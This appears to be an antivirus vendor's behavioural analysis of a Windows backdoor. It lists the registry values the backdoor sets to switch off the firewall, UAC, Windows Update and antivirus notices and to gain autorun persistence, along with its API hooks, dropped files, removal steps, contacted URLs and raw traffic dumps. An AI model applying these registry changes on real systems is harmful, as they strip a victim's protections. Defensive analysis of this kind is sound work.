"{67EA19A0-CCEF-11D0-8024-00C04FD75D13} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 7C 6C 9C 7C 42 DC F5 45 59 E7 D1 01"
"{40DD6E20-7C17-11CE-A804-00AA003CA9F6} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 E6 6F DD 77 DC 89 44 46 59 E7 D1 01"
"{ECF03A33-103D-11D2-854D-006008059367} {00000000-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 E6 6F DD 77 3C 64 1E 46 59 E7 D1 01"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AdobeUpdater6"
The process %original file name%.exe:1676 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 17 13 A6 BE 43 69 61 B0 D9 D3 F8 ED 8A 25 44"
The process csslisog.exe:1780 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 B8 CB 89 5E 20 DB A9 70 1C 42 6F 64 9F EE A8"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"jfghdug_ooetvtgk" = "TRUE"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
"FirewallOverride" = "1"
"UacDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\wuauserv]
"Start" = "4"
A firewall is disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"
To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SweGbgid" = "%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe"
The following service is disabled:
[HKLM\System\CurrentControlSet\Services\wscsvc]
"Start" = "4"
Firewall notifications are disabled:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"
The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"
The process csslisog.exe:3908 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 6F BA D6 9B 68 DC 11 CA D3 70 DE 08 65 4E 39"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
| MD5 | File path |
|---|---|
| 020bc0a588b9685208985934b21af1a6 | c:\Documents and Settings\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\setup.exe |
| a8fd47ec1de9369f835bd707bd5f4ddb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\AdbeRdr1012_en_US.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Backdoor installs the following user-mode hooks in USER32.dll:
TranslateMessage
The Backdoor installs the following user-mode hooks in WS2_32.dll:
WSASendTo
WSARecvFrom
WSASend
recv
WSARecv
send
closesocket
recvfrom
sendto
The Backdoor installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
AdbeRdr1012_en_US.exe:2908
verclsid.exe:3340
verclsid.exe:3280
verclsid.exe:3208
U78n983:2324
MsiExec.exe:2132
MsiExec.exe:3836
MsiExec.exe:432
setup.exe:3420
Adobe_Updater.exe:3104
%original file name%.exe:1676
csslisog.exe:1780
csslisog.exe:3908 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Data1.cab (895790 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Setup.ini (498 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AcroRead.msi (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\config.bin (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\RDC.bin (114531 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\setup.exe (9595 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AdobeSFX.log (6393 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AdbeRdrUpd1012.msp (115622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\installer.bin (286043 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\ABCPY.INI (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\csslisog.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~1B.tmp (968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001}\FixTransforms.exe (422180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001}\FixTransforms.exe (422180 bytes)
%Documents and Settings%\%current user%\Favorites (4 bytes)
%Program Files%\Common Files\System\ado\msadrh15.dll.new (114 bytes)
%Program Files%\Common Files\System\directdb.dll.new (1202 bytes)
%Program Files%\Common Files\System\Ole DB\msdaosp.dll (2854 bytes)
%System%\dllcache\msdaenum.dll.new (8 bytes)
%Program Files%\Common Files\System\Ole DB\msdaps.dll (4038 bytes)
%Program Files%\Internet Explorer\Connection Wizard (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\updater.log (10010 bytes)
%Documents and Settings%\ALL USERS (4 bytes)
%Program Files%\Common Files\VMware\Drivers\scsi (4 bytes)
%System%\dllcache\msader15.dll.new (48 bytes)
%Program Files%\Common Files\VMware\Drivers\Virtual Printer\TPOG3\i386 (4 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
%Program Files%\Common Files\System\Ole DB\msdaora.dll (4646 bytes)
%System%\dllcache\dao360.dll (6722 bytes)
%Program Files%\Common Files\Microsoft Shared\Speech\sapi.dll (20934 bytes)
%Program Files%\Common Files\Java\JAVA UPDATE (4 bytes)
%Program Files%\Common Files\System\wab32.dll (11654 bytes)
%Program Files%\Internet Explorer\Connection Wizard\RCX16B.tmp (1429 bytes)
%System%\dllcache\msaddsr.dll (48 bytes)
%System%\dllcache\msdadc.dll (8 bytes)
%Program Files%\Common Files\Adobe\ARM\1.0 (4 bytes)
%Program Files%\Internet Explorer\Connection Wizard\inetwiz.exe (2566 bytes)
%Program Files%\Common Files\System\msadc\msdarem.dll (4214 bytes)
%Program Files%\Common Files\System\ado\msjro.dll (4056 bytes)
%WinDir%\Temp\Perflib_Perfdata_668.dat (4 bytes)
%Program Files%\Common Files\Adobe\Acrobat\ActiveX (4 bytes)
%System%\dllcache\msdasc.dll.new (8 bytes)
%Program Files%\Common Files\System\Ole DB\msdaora.dll.new (2562 bytes)
%Program Files%\Common Files\System\msadc\msdfmap.dll (2638 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
%Program Files%\Common Files\System\Ole DB\msdatl3.dll.new (1202 bytes)
%Program Files%\Common Files\MSSoap\Binaries\Resources\1033\mssoapr.dll (23 bytes)
%Documents and Settings%\%current user%\SendTo (4 bytes)
%Program Files%\Common Files\System\Ole DB\sqloledb.dll (10886 bytes)
%Program Files%\Common Files\System\ado\msado15.dll (10134 bytes)
%WinDir%\Prefetch\PERL.EXE-28C02382.pf (1202 bytes)
%Program Files%\Adobe\Reader 10.0\Reader\PLUG_INS3D (4 bytes)
%Program Files%\Common Files\Microsoft Shared\DW (4 bytes)
%System%\dllcache\msadcor.dll.new (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\trialoc.dll (2566 bytes)
C:\$Directory (4 bytes)
%Program Files%\Internet Explorer\IEXPLORE.EXE (2854 bytes)
%Program Files%\Common Files\System\msadc\msadcs.dll (2854 bytes)
C:\PROGRAM FILES (4 bytes)
%Program Files%\Common Files\System\msadc\msadco.dll.new (1346 bytes)
%Program Files%\Common Files\System\Ole DB\oledb32.dll (5488 bytes)
%Program Files%\Common Files\Microsoft Shared\Speech\sapisvr.exe (2638 bytes)
%System%\config (100 bytes)
%WinDir%\Installer\$PatchCache$\Managed (4 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwhelp.dll (3552 bytes)
%Program Files%\Common Files\VMware\Drivers\vmxnet3 (4 bytes)
%Program Files%\Common Files\System\ado\msadomd.dll (5384 bytes)
%Program Files%\Common Files\System\msadc\msadds.dll (4952 bytes)
%Program Files%\Common Files\System\ado\msado15.dll.new (6722 bytes)
%Program Files%\Common Files\System\Ole DB\sqlxmlx.dll (4646 bytes)
%Program Files%\Common Files\MSSoap\Binaries\wisc10.dll (2566 bytes)
%Program Files%\Common Files\System\msadc\msdarem.dll.new (1202 bytes)
%System%\dllcache\fp4autl.dll (8370 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mtjjyklc.log (4 bytes)
%System%\dllcache\msdaorar.dll (32 bytes)
%Program Files%\Internet Explorer\iedw.exe (2566 bytes)
%Program Files%\Common Files\MSSoap\Binaries\mssoap1.dll (6600 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwutil.dll (2854 bytes)
%System%\config\SysEvent.Evt (4000 bytes)
%Program Files%\COMMON FILES (12 bytes)
%Program Files%\Common Files\SpeechEngines\Microsoft\TTS\1033\spttseng.dll (25656 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwconn2.exe (4830 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%Program Files%\Common Files\Microsoft Shared\VGX\vgx.dll (15042 bytes)
%Program Files%\Common Files\System\ado\msadox.dll (4038 bytes)
%Program Files%\Common Files\System\Ole DB\msdaosp.dll.new (1202 bytes)
%Program Files%\Common Files\Microsoft Shared\OFFICE14\1033 (4 bytes)
%Program Files%\Adobe\Reader 10.0\Reader\plug_ins (4 bytes)
%Program Files%\Common Files\System\msadc\msadcs.dll.new (106 bytes)
%Program Files%\Common Files\MSSoap\Binaries\wisc10.dll.new (56 bytes)
%Program Files%\Common Files\System\Ole DB\MSDAIPP.DLL (10886 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwconn1.exe (4646 bytes)
%Program Files%\Common Files\System\Ole DB\msdaps.dll.new (2562 bytes)
%Program Files%\Common Files\System\Ole DB\msdasql.dll (6918 bytes)
%Program Files%\Common Files\System\ado\msadox.dll.new (2562 bytes)
%Program Files%\Common Files\SpeechEngines\Microsoft\spcommon.dll (4056 bytes)
%Program Files%\Common Files\System\msadc\msadce.dll (6726 bytes)
%Program Files%\Common Files\System\Ole DB\oledb32r.dll (65 bytes)
%WinDir%\inf (400 bytes)
%System%\dllcache\msdaer.dll.new (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\7fe17d887612.log (578 bytes)
%Program Files%\Common Files\System\ado\msador15.dll (2968 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aumLib.log (1203 bytes)
%Program Files%\Common Files\System\msadc\msadcf.dll (2854 bytes)
%Program Files%\Common Files\System\msadc\msdaprst.dll.new (2562 bytes)
%Program Files%\Common Files\Microsoft Shared\Triedit\triedit.dll (1346 bytes)
%Program Files%\Adobe\Reader 10.0\Resource (4 bytes)
%Program Files%\Common Files\Microsoft Shared\MSInfo\msinfo32.exe (1440 bytes)
%System%\dllcache\mssoapr.dll (48 bytes)
%Program Files%\Common Files\VMware\Drivers\VIDEO_XPDM (4 bytes)
%System%\dllcache\msdaprsr.dll.new (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwdl.dll (2566 bytes)
%Program Files%\Internet Explorer\HMMAPI.DLL (2566 bytes)
%System%\dllcache\msdasqlr.dll (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\isignup.exe (2566 bytes)
C:\Config.Msi (868 bytes)
%System%\dllcache\msdaremr.dll.new (32 bytes)
%Program Files%\Common Files\Microsoft Shared\Triedit\TRIEDIT.DLL (872 bytes)
%Program Files%\Common Files\System\Ole DB\RCX15F.tmp (3365 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\AdobeUpdaterPrefs.dat (1088 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aum.log (2309 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\swegbgid.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jyabgndb.exe (1281 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"SweGbgid" = "%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 143360 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 147456 | 208896 | 206336 | 5.45775 | 38dcd0b41f462be95215c047d40da3e4 |
| .rsrc | 356352 | 4096 | 2560 | 2.65153 | 7512018f609f84d73448748b8bcf00d5 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://e4937.d.akamaiedge.net/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe | |
| hxxp://a1953.d.akamai.net/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe | |
| hxxp://e6845.dscb1.akamaiedge.net/pca3.crl | |
| hxxp://e6845.dscb1.akamaiedge.net/CSC3-2009-2.crl | |
| hxxp://ardownload.adobe.com/pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe | 212.30.134.183 |
| hxxp://crl.verisign.com/pca3.crl | 23.37.37.163 |
| hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl | 23.37.37.163 |
| hxxp://fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe | 2.16.186.8 |
| google.com | 216.58.209.174 |
| gugendolik.com | 188.93.211.67 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "a734771f14845f861a60ddbe6518dcb1:1469523919"
Last-Modified: Tue, 26 Jul 2016 09:05:19 GMT
Date: Tue, 26 Jul 2016 16:17:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0.. 0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at https://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA..160726090003Z..160809090003Z0...0!.....V..t..'.F(z....121202220203Z0!.... .;...9.7.......090826054212Z0!...\.)../F..^p..s...100722072726Z0!......P....A.x......100708154305Z0!.......O#.`n.5j.9...100930040708Z0!..../..8~p...h......091006052837Z0!.....(../L....--aK..091029040207Z0!...aW.....B.!.0..t..090909121104Z0!...g,..4(vv....mJ_..100514054218Z0!.....V.....(..-..p..090826162211Z0!....O..,J.N.n...Ly..091028032204Z0!....42r...I.Y@...3..100526162150Z0!.........}..Dt...!..090922192227Z0!.......2l....7i..?..101109030426Z0!.....p%...l,AogP....100523060224Z0!...,.P.C......*.....100303082219Z0!...NRPL.............100413090225Z0!....1w....d.&..8....091026111702Z0!......F....e........090608081352Z0!.....6..d6.7..4.....100924123027Z0!....$..*...s..&s....100219210742Z0!......Q_.G..|.......091009145530Z0!........>..O...=72..100616160934Z0!....Xlm$|".su.......090619194406Z0!......J)..E......C..100922142243Z0!...D......u.y.Iy{k..101026130323Z0!...El...)>..W..<K...101004225456Z0!...p..wy.i.zc...X...091117001921Z0!.....,{..^..........091203194409Z0!....B....d...*.P.@..100705023431Z0!.......m. .V.....~..101111134216Z0!...2.R.i.{..........091029071123Z0!...`F..q2..O.:......100602074221Z0!...a{.-...@...'.....100723194022Z0!........fW.y.,s.....101011182226Z0!....Um..}.8)........100324085953Z0!....,u.box
<<< skipped >>>
GET /pca3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "6df834358a0bb5e934947d15c0372dc3:1466795723"
Last-Modified: Fri, 24 Jun 2016 19:15:23 GMT
Date: Tue, 26 Jul 2016 16:17:49 GMT
Content-Length: 933
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U....Class 3 Public Primary Certification Authority..160623000000Z..160930235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.......fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2....{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N....* ....010207212031Z0!..N....-.1Gq.@...C..040401175251Z0!..Y......w`G........070411175657Z0!..Z`..H.@B....Z.*q..080403172017Z0!..l....I...Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1..7<.....e..010207211822Z0...*.H...............DA.............Q>...#........H#......;....._.....v.W..@.:k[.#..,...:...DI. ,g... ..].w.b.d.....1.p.s...];Bs..E.9>...l}....5].HTTP/1.1 200 OK..Server: Apache..ETag: "6df834358a0bb5e934947d15c0372dc3:1466795723"..Last-Modified: Fri, 24 Jun 2016 19:15:23 GMT..Date: Tue, 26 Jul 2016 16:17:49 GMT..Content-Length: 933..Connection: keep-alive..Content-Type: application/pkix-crl..0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U....Class 3 Public Primary Certification Authority..160623000000Z..160930235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.......fh...020923171400Z0!...?A....a.nF`.P....020923171548Z
<<< skipped >>>
GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: fpdownload.macromedia.com
Connection: keep-alive
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 26 Jul 2016 16:16:59 GMT
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe was not found on this server.</p>.</body></html>...
HEAD /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Length: 53784984
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:00 GMT
Connection: keep-alive
....
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=0-1048575
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:00 GMT
Content-Range: bytes 0-1048575/53784984
Content-Length: 1048576
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........L...L...L...k...K...k...X...E.N.U...E.X.....E._.....R._.O.......O...L...\...E.R.V...R.O.M...E.J.M...RichL...........................PE..L......O......................0......5............@..........................05.....S.4.....................................Lz.......0..../...........4..............................................5..@....................y..@....................text...@........................... ..`.rdata..............................@..@.data...@........$..................@....rsrc...../..0..../.................@..@................................................................................................................................................................................................................................................................................................................................................................U..Q.M..E...\2D..M..........M...........].......U..Q.M..E....P.M........].......U..Q.M..E..@...]................U..Q.M..M.......E....t..M.Q..*......E...].......U..Q.M..E..M.........]..........U..Q.M..E.........].............U..Q.M..E.........].............U..Q.M..E.P.M.Q.U.R.M........?.....]............U..Q.M..E.P.M..............]....U..Q.M..M.......E....t..M.Q.p....E...]..........U..Q.M..E... 3D...].............U..Q.M..M.......E....t..M.Q.U)......E...].......U..Q.M..E.P.M..m....E...].......U..Q.M..E.P.M..m
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=1048576-2097151
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:01 GMT
Content-Range: bytes 1048576-2097151/53784984
Content-Length: 1048576
Connection: keep-alive
.m..t..9......L.(.t..Z.u<Ma$}.#....t*.cX.;L.E.Et$..8v3...,HP.d..B....w?W...`rv$.e.$.w{...{....A..H5<=...9...*=..g.O...;-../.Ayy.P.\..E............!..L.....0..Xs....:5...G.....i....'.Y../iw............&..c..G.59J.bNd.~....<X.......lH7....@.......C..'6..!....hY....U..5..I .......J........$l.hT..$....[C...<.z3......=.)l..D..4.f..?.e.S......L.C.........6....B..S.Q....c..-.p..Y.......P....n...k|..D.P!_.F. C=B. .e.....^Q.Vu.....X...jV...B.........Aq..?)...v.d5..w..;.sc.WCO.< .."....d.#..l..V^.. ..D5......^.u....%.l...zn.q..vY. R..C.....N{D&.p............P..$@.z..@..p..s.i..A......v..s...*.v....R.-hL.#.2Q..@....]`.q....7....e..._#3...0.....sL....^r...r9....Mn..n....8....W.z.....O...c.\F.a.x..n.~......=~.G...yv....P...V...."9....BNu.C.m..2...yN....!0v..b.WB8scr.D.)...m..u......T...y........P.g..ov.).xA..4p.j....L..u...H.......6..w...._TAO.D......|..s,..}...@..NX3...:..Z...1...F..BK>..h.dH.(6?....'....B.>.......Z....Q..Z..6.3.'|..5t.7.K..h...hR\Vd...4'.............i..pN.s...z..]...I.....r.Z^.\..=........P...Y..A H..G6TRL....Q.[.......S2y...p~G.*.j....4.06y....I..............5..x..........I^<.9n?..2............r.i..iMHWz...0...s....U..3.f.#C.!....h]bm..fV.z...Aj....D...v.?...M(....O..P.,._y.N.....!.S....9.....z1.n6...~.W...D..8..Y.Eo.<W...;CP..}&n. ..X.Z..W..m'...>d.....R..@.3 ........bpr....)i.c.;....c...........w....Q...Q..U..:>6A.WB.q... ,*D.m.>..5.}..e.t.G..m.x]n,D...6..|..\.......#O.....c..O.7N..2..8..n`...BMN`..z.oU.....K-@.%..).K*.S...h.r.......t[.5D. ian..7.O<rh ...E........
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=2097152-3145727
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:01 GMT
Content-Range: bytes 2097152-3145727/53784984
Content-Length: 1048576
Connection: keep-alive
..r.....\h.Q.E..e.\..|..JP.........*..s...[..L.)0........CO..."....tG....Q.y9%...J.........y./...~.R[....o...i..@YJhi.(.~Z.).2#Z...(...:o.....S9.p...C?j.../j...q.._.0.Ctb7}.MCR.....yI...'~%.......m...c.a.i.......6V.C.k....7...z......Z.63.._@.....R...!..H.NVD)....s...........f...F..&.....8G......L..0.H..58h....'I.X{.4#%q>...&.f..%............<..NJ`..Xmi.....z~J\.Er.l.:BSV..%..lq......*l.........K......d....W..s.6..<X...nyO s-....x...J......)..n..$.d).;.3h....0?.(0...7HlO. .8.-...{.C5.9....3j..8..c.[.o.....q4..Au...I^...$Q...U .g...WY.......c. ..../..wh.k_. .P.............v.\6el5.@3....m..g_F.X2...].K.tbx9.}.@....U.EO.nt.X.V0 ....<g.%E.......^W.at.....6q.#..?s.X.....J'yY..-. .QX|..U.u.....q....E.DY....:h..ck..V....|.....P.`.$..`l..Qf.70...`j..../..}.ER.Y.....E......BV.=R`$...`s....cg.2.mI7_....e... ..P.....?..Of.B...3...2n.O..<..J\;RQ...B8..W........B._.........Ap......#....Nk...o..L!.e?....Ky..$P;Ez...$.....\ .W..l.....U.D\.!W.?...t...vv...I[....t..<^p..AQ.1hL;.....y.K.'..D..Y4".K...#v.......Ho..~.G....M..?qh... . ..7..?U....BG.1..@<U|t`5Y.w...ef..$......^.r...c&....g>...y....g..bf...".b.....p..b.]......0....!x.e#oy>..{x.Z..._.s..C..~..9P.u.P.{'v..y.Y-.....up5FRm..._../.Wg...%r..u`.t......x.W6...9>.e.Q.9.Z....m...LD.C..=.l|...."...[....... .7.e.X.z......D......J9@. f.....bL$.d*H....w.......H.DM....J@...@..&/..#...........4..T...*@....o[.A.{.M.E..f..Z....2.|...7.hz..&.s....("F.k..G.K.../.qY.oAT....J.r.~'.b.@`......^...X....../.2*..\qQ6. ..Q...O...........M..M..8?...,......S.....G.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
